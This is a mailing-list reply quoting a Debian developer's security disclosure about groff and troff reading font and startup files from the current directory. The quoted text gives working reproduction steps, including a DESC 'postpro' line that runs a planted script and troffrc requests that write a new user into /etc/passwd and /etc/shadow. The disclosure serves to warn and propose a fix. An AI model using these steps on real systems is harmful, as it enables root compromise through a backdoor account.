Re: Groff/troff security exposure
Continue previous mail. Testing 1 on Debian woody(unstable). Got the following message:
../../../tmp/exploit: /etc/passwd: Permission denied
Is 1 also fixed in Debian?
> Este es un mensaje multipartes en formato MIME.
> Content-Type: text/plain; charset=iso-8859-1
> Content-Transfer-Encoding: 8bit
> I have just read a security announcement sent by ISSalert regarding groff
> manipulation that can lead to a security compromise (available at
> The problem is that both troff and groff read files in the working directory
> which can spin off commands in behalf of the user. This can be very sensible if
> the one running a 'man' command is root since the whole system is exposed.
> For in depth information refer to the link above, I have tested an exploit in
> Debian GNU/Linux 2.2 and works as expected.
> 1.- groff attack
> Reason: Groff will read any "devXX" directory available at the local dir and
> process 'postpro' commands execv'ing them.
> Test: Put a 'devlatin1' copy of /usr/share/groff/font/devlatin1/ files in the
> /tmp dir, edit the DESC file to include (at the end):
> postpro ../../../tmp/exploit
> Now put your favourite exploit in /tmp/exploit (for example add a new user to
> /etc/passwd and /etc/shadow)
> Then run 'groff -Tlatin1 ls.1' in /tmp as root. See what happens
> 2.- troff attack
> Reason: troff will read any 'troffrc' file in the current dir
> Test: put a troffrc file in the /tmp dir, check the troff manpage to see what it
> can do. For example:
> .opena passwds /etc/passwd
> .write passwds guest:x:10000:10000::/:/bin/sh
> .close passwds
> .opena passwds /etc/shadow
> .write passwds guest:AqualifiedHashPsswd:11215:0:99999:7:::
> .close passwds
> And run 'troff *anyfile*'
> Check /etc/passwd :)
> Now, this will not exactly work when doing 'man' since it will
> 1.- set its directory to where $MANPATH or where /etc/manpath.config points to
> 2.- change euid to 'man'.
> However, man is not the only system that uses groff. I've checked package
> dependencies and, for example: gnosamba (configuration utility for Samba that
> will surely run as root since it has to change /etc/samba) and a2ps *do* use
> I have not checked their sources on how could this be exploited, but if they
> have not be carefully coded to check this situation (like man is).
> My suggestion: groff and troff should *not* extend their paths to current
> directory, *or* should not allow processing files from different users if owner
> is root (to avoid a root compromise).
> Javier Fernández-Sanguino Peña
> Debian GNU/Linux developer
> Content-Type: text/x-vcard; charset=us-ascii;
> Content-Transfer-Encoding: 7bit
> Content-Description: Tarjeta de Javier Fernandez-Sanguino Peña
> Content-Disposition: attachment;
> n:Fernández-Sanguino Peña;Javier
> tel;fax:+34-91 806 46 41
> tel;work:+34-91 806 46 40
> org:SGI-GMV sistemas;Seguridad Lógica
> adr:;;Sector Foresta 1;Tres Cantos;Madrid;E-28760;Spain
> fn:Javier Fernández-Sanguino Peña
> To UNSUBSCRIBE, email to email@example.com
> with a subject of "unsubscribe". Trouble? Contact firstname.lastname@example.org